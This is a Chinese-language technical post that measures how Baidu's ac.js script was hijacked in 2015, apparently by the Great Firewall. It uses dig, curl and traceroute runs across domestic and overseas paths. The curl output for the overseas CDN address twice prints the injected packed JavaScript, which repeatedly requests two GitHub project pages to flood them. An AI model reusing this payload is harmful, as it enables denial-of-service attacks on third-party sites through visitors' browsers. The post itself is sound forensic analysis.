本次 GFW 劫持百度脚本方式猜测

先说自己的结论。分析来看，有很大把握怀疑，本次GFW劫持的是百度海外CDN回国连接，并没有直接劫持用户到CDN的链接。直接给CDN投毒，比劫持用户链接恶劣而且隐蔽得多。

坐标广东深圳，使用某JS位于peer1的VPN作为出口。VPN interface为tun0。8.8.8.0/24已默认走VPN。
测试链接为http://dup.baidustatic.com/tpl/ac.js。

百度统计国外CDN解析：

[siyanmao@siyanmao-k29 ~]$ dig dup.baidustatic.com @8.8.8.8

; <<>> DiG 9.9.2-P2 <<>> dup.baidustatic.com @8.8.8.8
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51040
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;dup.baidustatic.com.           IN      A

;; ANSWER SECTION:
dup.baidustatic.com.    2938    IN      CNAME   ecomcbjs.jomodns.com.
ecomcbjs.jomodns.com.   59      IN      CNAME   ecomcbjs.wshifen.com.
ecomcbjs.wshifen.com.   299     IN      A       180.76.3.138

;; Query time: 531 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sat Apr  4 13:07:22 2015
;; MSG SIZE  rcvd: 126

百度统计国内CDN地址解析：

[siyanmao@siyanmao-k29 ~]$ dig dup.baidustatic.com @114.114.114.114

; <<>> DiG 9.9.2-P2 <<>> dup.baidustatic.com @114.114.114.114
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22259
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;dup.baidustatic.com.           IN      A

;; ANSWER SECTION:
dup.baidustatic.com.    5030    IN      CNAME   ecomcbjs.jomodns.com.
ecomcbjs.jomodns.com.   30      IN      A       58.215.123.49

;; Query time: 25 msec
;; SERVER: 114.114.114.114#53(114.114.114.114)
;; WHEN: Sat Apr  4 13:10:10 2015
;; MSG SIZE  rcvd: 95

在国内请求国内地址，尝试若干次，没有发现劫持现象。

root@Cat_FireWall:~# curl --interface pppoe-pppoe_tel http://58.215.123.49/tpl/ac.js | grep github
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   167  100   167    0     0   3036      0 --:--:-- --:--:-- --:--:--  3092

在国内请求国外地址，发现劫持现象。

root@Cat_FireWall:~# curl --interface pppoe-pppoe_tel http://180.76.3.138/tpl/ac.js | grep github
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1130  100  1130    0     0   2457      0 --:--:-- --:--:-- --:--:--  2456
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

在国外请求国内地址，尝试若干次，未发现劫持现象。

root@Cat_FireWall:~# curl --interface tun0 http://58.215.123.49/tpl/ac.js | grep github
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   167  100   167    0     0    243      0 --:--:-- --:--:-- --:--:--   243

在国外请求国外地址，发现劫持现象。

root@Cat_FireWall:~# curl --interface tun0 http://180.76.3.138/tpl/ac.js | grep github
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1130  100  1130    0     0   1635      0 --:--:-- --:--:-- --:--:--  1635
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

附上traceroute结果：

国内到国内：

root@Cat_FireWall:~# traceroute -n -w 1 -i pppoe-pppoe_tel 58.215.123.49
traceroute to 58.215.123.49 (58.215.123.49), 30 hops max, 38 byte packets
 1  -------------  3.759 ms  2.109 ms  2.328 ms
 2  -------------  8.620 ms  1.946 ms  17.896 ms
 3  58.60.24.33  2.590 ms  2.333 ms  2.451 ms
 4  183.56.66.2  3.262 ms  3.915 ms  183.56.65.86  3.690 ms
 5  202.97.47.165  26.488 ms  23.881 ms  28.291 ms
 6  61.160.130.50  25.855 ms  26.168 ms  24.748 ms
 7  *  *  *
 8  *  *  *
 9  *  *  *
10  *  *  *
11  *  *  *
12  *  *  *
13  *  *  *
14  *  *  *
15  *  *  *
16  *  *^C

国内到国外：

root@Cat_FireWall:~# traceroute -n -w 1 -i pppoe-pppoe_tel 180.76.3.138
traceroute to 180.76.3.138 (180.76.3.138), 30 hops max, 38 byte packets
 1  -------------  3.451 ms  2.017 ms  2.162 ms
 2  -------------  1.919 ms  3.072 ms  1.432 ms
 3  119.145.220.82  2.140 ms  2.300 ms  2.317 ms
 4  183.56.65.78  10.582 ms  1.811 ms  183.56.65.74  2.364 ms
 5  202.97.64.14  6.494 ms  202.97.64.90  6.247 ms  202.97.64.10  7.423 ms
 6  202.97.33.214  9.657 ms  7.747 ms  202.97.33.202  4.956 ms
 7  202.97.61.234  9.073 ms  7.286 ms  7.871 ms
 8  202.97.60.214  161.911 ms  164.494 ms  165.175 ms
 9  129.250.6.96  178.692 ms  173.779 ms  129.250.6.200  173.363 ms
10  129.250.3.89  225.555 ms  129.250.2.121  224.995 ms  129.250.3.89  224.500 ms
11  129.250.6.125  232.907 ms  129.250.6.115  241.194 ms  129.250.6.125  232.442 ms
12  129.250.3.11  213.466 ms  203.131.246.146  209.703 ms  129.250.3.11  213.506 ms
13  203.131.246.146  207.230 ms  211.049 ms  212.382 ms
14  *  *  *
15  *  *  *
16  *  *  *
17  *  *  *
18  *  *  *
19  *  *  *
20  *  *  *
21  *  *  *
22  *  *  *
23  *^C

国外到国内：

root@Cat_FireWall:~# traceroute -n -w 1 -i tun0 58.215.123.49
traceroute to 58.215.123.49 (58.215.123.49), 30 hops max, 38 byte packets
 1  --------------  195.947 ms  197.496 ms  197.131 ms
 2  *  *  *
 3  216.187.88.137  198.443 ms  196.670 ms  216.187.88.37  196.077 ms
 4  4.53.230.5  218.506 ms  77.67.70.205  196.052 ms  201.644 ms
 5  4.53.230.5  205.076 ms  218.30.53.33  197.377 ms  4.53.230.5  231.133 ms
 6  4.69.152.17  210.480 ms  205.735 ms  *
 7  4.53.210.114  205.601 ms  4.53.210.110  204.958 ms  202.97.50.1  335.257 ms
 8  202.97.49.21  208.979 ms  202.97.35.105  363.427 ms  392.479 ms
 9  202.97.49.21  207.914 ms  202.97.33.29  343.229 ms  202.97.49.21  207.652 ms
10  202.97.50.109  370.422 ms  202.97.35.105  373.707 ms  202.97.50.109  370.264 ms
11  202.97.33.29  348.333 ms  347.784 ms  *
12  202.97.39.94  350.945 ms  58.215.128.78  356.080 ms  *
13  202.97.39.94  349.851 ms  *  352.852 ms
14  202.102.19.146  382.604 ms  *  *
15  *  *  *
16  *  *  *
17  *  *  *
18  *  *  *
19  *  *  *
20  *  *  *
21  *  *  *
22  *  *  *
23  *  *  *
24  *  *  *
25  *  *  *
26^C

国外到国外：

root@Cat_FireWall:~# traceroute -n -w 1 -i tun0 180.76.3.138
traceroute to 180.76.3.138 (180.76.3.138), 30 hops max, 38 byte packets
 1  -------------  183.651 ms  184.821 ms  184.487 ms
 2  *  *  *
 3  216.187.88.37  183.902 ms  *  216.187.88.137  185.452 ms
 4  216.187.88.61  185.633 ms  216.187.124.120  186.372 ms  206.72.210.114  186.115 ms
 5  216.187.88.57  188.105 ms  118.143.224.1  414.602 ms  216.187.124.120  185.231 ms
 6  118.143.224.9  419.347 ms  118.143.238.20  421.086 ms  118.143.224.9  421.095 ms
 7  218.189.31.102  422.702 ms  118.143.224.25  429.397 ms  118.143.238.20  415.053 ms
 8  *  218.189.5.20  419.124 ms  218.189.31.102  416.379 ms
 9  *  *  *
10  *  *  *
11  *  *  *
12  *  *  *
13  *  *  *
14  *  *  *
15  *  *  *
16  *  *  *
17  *  *  *
18  *  *  *
19  *  *  *
20  *  *  *
21  *  *  *
22  *  *  *
23  *  *  *
24  *  *  *
25  *  *^C